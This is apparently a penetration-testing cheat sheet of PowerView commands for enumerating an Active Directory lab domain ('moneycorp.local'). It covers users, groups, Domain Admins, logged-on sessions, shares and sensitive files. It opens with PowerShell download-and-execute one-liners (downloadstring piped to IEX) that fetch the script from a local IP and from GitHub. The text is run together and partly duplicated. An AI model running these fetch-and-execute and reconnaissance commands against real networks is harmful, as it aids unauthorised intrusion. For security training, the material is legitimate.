#from Linux to Windows#Local(new-object system.net.webclient).downloadstring('http://192.168.1.1/powerview.ps1') | IEX#Remotly(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1') | IEX
Get the last logged user on a computer (needs administrative rights and remote registry on the target)
Get-LastLoggedon -ComputerName <servername>
Find shares on hosts in the current domain.
Invoke-ShareFinder -Verbose
Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose
Get all fileservers of the domain
Get-NetFileServerPowerView EnumerationGet current domainGet-NetDomainGet object of another domainGet-NetDomain-Domain moneycorp.localGet domain SID for the current domainGet-DomainSIDGet domain policy for the current domainGet-DomainPolicy(Get-DomainPolicy)."system access"Get domain policy for another domain(Get-DomainPolicy-domain moneycorp.local)."system access"(Get-DomainPolicy-domain moneycorp.local)."kerberos policy"(Get-DomainPolicy-domain moneycorp.local)."Privilege Rights"# OR(Get-DomainPolicy)."KerberosPolicy"#Kerberos tickets info(MaxServiceAge)(Get-DomainPolicy)."SystemAccess"#Password policy(Get-DomainPolicy).PrivilegeRights #Check your privilegesGet domain controllers for the current domainGet-NetDomainControllerGet domain controllers for another domainGet-NetDomainController-Domain moneycorp.localGet a list of users in the current domainGet-NetUserGet-NetUser-Username student1Get list of all properties for users in the current domainGet-UserPropertyGet-UserProperty-Properties pwdlastset,logoncount,badpwdcountGet-UserProperty-Properties logoncountGet-UserProperty-Properties badpwdcountSearch for a particular string in a user's attributesFind-UserField -SearchField Description -SearchTerm "built"Get a list of computers in the current domainGet-NetComputerGet-NetComputer -OperatingSystem "*Server 2016*"Get-NetComputer -PingGet-NetComputer -FullDataGet all the groups in the current domainGet-NetGroupGet-NetGroup -Domain <targetdomain>Get-NetGroup -FullDataGet-NetComputer -DomainGet all groups containing the word "admin" in group nameGet-NetGroup *admin*Get-NetGroup -GroupName *admin*Get-NetGroup *admin* -FullDataGet-NetGroup -GroupName *admin* -Doamin moneycorp.localGet all the members of the Domain Admins groupGet-NetGroupMember -GroupName "Domain Admins" -Recurse#test the below command#Get-NetGroupMember -GroupName "Domain Admins" -Properties * | select DistinguishedName,GroupCategory,GroupScope,Name,Members
Get the group membership for a userGet-NetGroup -UserName "student1"List all the local groups on a machine (needs administrator privs on non-dc machines)Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ListGroupsGet members of all the local groups on a machine (needs administrator privs on non-dc machines)Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -RecurseGet actively logged users on a computer (needs local admin rights on the target)Get-NetLoggedon -ComputerName dcorp-dc.dollarcorp.moneycorp.local Get locally logged users on a computer (needs remote registry on the target - started by-default on server OS)Get-LoggedonLocal -ComputerName dcorp-dc.dollarcorp.moneycorp.local Get the last logged user on a computer (needs administrative rights and remote registry on the target)Get-LastLoggedon -ComputerName <servername>Find shares on hosts in current domain.Invoke-ShareFinder -VerboseFind sensitive files on computers in the domainInvoke-FileFinder -VerboseGet all fileservers of the domainGet-NetFileServer